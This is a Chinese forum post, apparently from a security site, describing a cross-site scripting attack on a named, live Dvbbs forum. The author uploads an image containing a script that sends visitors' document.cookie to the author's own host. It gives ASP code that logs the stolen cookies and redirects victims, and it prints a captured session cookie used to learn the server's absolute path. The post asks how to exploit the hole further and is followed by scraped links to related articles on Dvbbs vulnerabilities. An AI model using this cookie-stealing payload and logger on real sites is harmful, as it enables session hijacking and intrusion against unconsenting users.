关于动网的cookie泻露站点绝路径的问题_安全相关

一、跨站测试
先看看我的一次跨站测试吧
我以职业欠钱的站点做测试吧:
Host:zhiyeqianqian.51web.cn
My Test:
先在他的论谈上传两张图,
图一的内容是:
<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script>
得到url为UploadFile/2005-6/200562716565777847.jpg
图二则是偶的个人照
UploadFile/2005-6/200562716563048909.jpg
写个盗cookie的代码到我的空间,lcx的盗cookie代码有问题,所以修改了一下。
<%
cookiefile=Server.MapPath("cookie.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)
cookiefile.Write(Request.QueryString&"<br>")
cookiefile.close
set fs = nothing
%>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://zhiyeqianqian.51web.cn/UploadFile/2005-6/200562716563048909.jpg">
接下来,点击图一,自动转到图二,

二、结果分析
再到我的空间看一下,抓到cookie如下:
msg=ewwwrootzhiyeqianqianwwwroot=UserID=218&usercookies=1&StatUserID=2190418138&password=想要吗?嘿嘿&userhidden=2&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzi;%20ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;%20Dvbbs;%20DvbbsMagicFace=862;%20upNum=2;%20ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIM<br>
分析cookie我们不难看出他的绝对路径是e:\wwwroot\zhiyeqianqian\wwwroot

三、论谈
本来,最初的测试我是在测试BCT论谈,成功暴出他的绝对路径,一开始的时候,我还认为可能又是动网出洞洞了,所以又去测试了其它几个站,测试结果是其它的站点并没有暴出路径,今天再次测试“欠我钱”的论谈,却又暴不出来,查了一下代码,和别人的代码一个样,根本没什么差别。
偶想听听大家的看法,到底是哪里出了问题,能不能深入利用~~~

时间: 2024-09-23 15:17:23

关于动网的cookie泻露站点绝路径的问题_安全相关的相关文章

asp.net读取动网论坛cookie的问题

问题描述 小弟最近用asp.net+sql2000做个网站,准备把以前用的动网论坛整合进来,实现一站式注册,一站式登陆,一站式注销.请问各位大侠,如果用asp.net读取动网论坛的cookie呀.最好能提供个解决方案,在此谢谢各位了. 解决方案 解决方案二:帮你顶解决方案三:我来顶了解决方案四:帮顶解决方案五:求各位大侠了.解决方案六:要知道动网的cookie内容结构找动网的接口人讨解决方案七:引用5楼homesos的回复: 要知道动网的cookie内容结构找动网的接口人讨 cookie内容结构

动网dvbbs7.1论坛权限提升漏洞及防范(图)_漏洞研究

在6月份的黑防上看到<动网7.1漏洞惊现江湖>一文说是admin_postings.asp文件 存在注入漏洞但利用的前提是拥有超级斑竹或前台管理员权限.我想起以前发现的动网7.x版本存在一个前台权限提升漏洞 正好可以结合起来利用.这个前台权限提升漏洞对7.x的Access和 Sql版都有效.下面我们就以7.0 sp2 sql版讲解这个漏洞的利用. 漏洞分析 我们知道动网是通过GroupID来判断当前用户所在的组的然后再通过组的信息判断用户的权限.它是如何取得这个GroupID的呢让我们看看登录

动网7.x权限提升漏洞原理_漏洞研究

在6月份的黑防上看到<动网7.1漏洞惊现江湖>一文说是admin_postings.asp文件存在注入漏洞但利用的前提是拥有超级版主或前台管理员权限.我想起以前发现的动网7.x版本存在一个前台权限提升漏洞 正好可以结合起来利用.这个前台权限提升漏洞对7.x的ccess和 SQL版都有效.下面我们就以7.0 SP2 SQL版讲解这个漏洞的利用. 漏洞分析 我们知道动网是通过GroupID来判断当前用户所在的组的然后再通过组的信息判断用户的权限.它是如何取得这个GroupID的呢让我们看看登录验证

对动网论坛作搜索引擎优化

搜索引擎|优化|搜索引擎|优化 今天对 车米网 的论坛作了优化,发现动网论坛7.0本来就考虑到了搜索引擎的问题,只需要简单修改就可以很好的优化了. 动网论坛采用javascript+模版的方式显示页面,服务器将没有深加工的数据和js代码一起发送到客户端解析,减轻了服务器负担,但是搜索引擎一般不会解析javascript代码的,不过动网论坛的主要页面都有判断浏览器类型,如果是搜索引擎,自动跳转到专门为浏览器显示的页面,但是这些页面做得不是太好,下面是我修改的结果: 昨天我把论坛的meta标签的de

全部分数送上 求asp.net(1.1)网站整合动网论坛8.2(例子)

问题描述 如题! 解决方案 解决方案二:怎么没有人回答!顶解决方案三:已前做过一个..首选要同步用户表.asp.net那边写cookie,动网那边取cookie动网那边写一个.asp文件来取cookie,验证.执行动网的登录.还有logout的asp文件要改一下.其它的好像没了.你要能等的话.晚上我回家去给你找找.或是你在网上搜一下也可以..我以前也是在网上找了些资料.然后改了改.解决方案四:那么这样在动网论坛里改用户做的一切操作能正常的插入库吗,如果网站有会员系统的话,和论坛上的帐号整合怎么处

为动网论坛添加一个密码嗅探器(DVBBS)_漏洞研究

动网先锋论坛,凭借其强大全面的功能,再加上它免费提供给个人用户,在网络众多论坛中,独树一帜.很多人都把它作为自己论坛的最佳首选.但是新版本的论坛,对用户密码采用了不可逆的MD5加密,即使是管理员,也无法查询到个人用户的密码.再数据库中只能查询了加密后的结果.   先描述一下它得登陆过程,用户输入帐号后号,调用MD5函数,输入的密码加密,然后比较存储在数据库的数据和密码加密的结果是否相同.如果相同,登陆成功,将个人信息保存在COOKIE中.   现在我们要自己动手,为论坛增加一项记录密码的功能. 

偶尔回头看动网论坛的衰落

动网论坛做为目前国内最大的http://www.aliyun.com/zixun/aggregation/9262.html">社区论坛软件服务提供商,依靠其强大的功能.非凡的访问速度和负载能力.友好方便的客户操作界面.优质的客户服务.国内领先的技术和强大而持续的产品研发并保持不断创新的能力,动网所提供的动网社区论坛产品已经占据了国内社区论坛产品使用比例的70%以上. 动网公司(海口动网先锋网络科技有限公司)是中国领先的互联网技术公司,在开发互联网应用.增值服务.网络集成及软件开发方面,动

ASP个人网站与动网整合非官方方法_应用技巧

虽然动网已提供有详细的"动网论坛系统Api接口开发人员指南",但像我这样的菜鸟一时半会可是参详不透的,汗.不甘心,在对其登录.验证等函数进行一番研究再加以测试后最终竟也小有所成,菜鸟也有菜鸟的办法:  本次测试的论坛版本为Version 7.1.0 Sp1,未对其他版本做进行测试  一.网站文件结构  wwwroot    ┝ index.asp    ┝ CheckUserLogin.asp    ┕ bbs/  二.整合原理  对于同步更新实现不困难,整合主要问题就是难在同步登录,

ASP个人网站与动网整合非官方方法

虽然动网已提供有详细的"动网论坛系统Api接口开发人员指南",但像我这样的菜鸟一时半会可是参详不透的,汗.不甘心,在对其登录.验证等函数进行一番研究再加以测试后最终竟也小有所成,菜鸟也有菜鸟的办法: 本次测试的论坛版本为Version 7.1.0 Sp1,未对其他版本做进行测试 一.网站文件结构 wwwroot    ┝ index.asp    ┝ CheckUserLogin.asp    ┕ bbs/ 二.整合原理 对于同步更新实现不困难,整合主要问题就是难在同步登录,所以我们的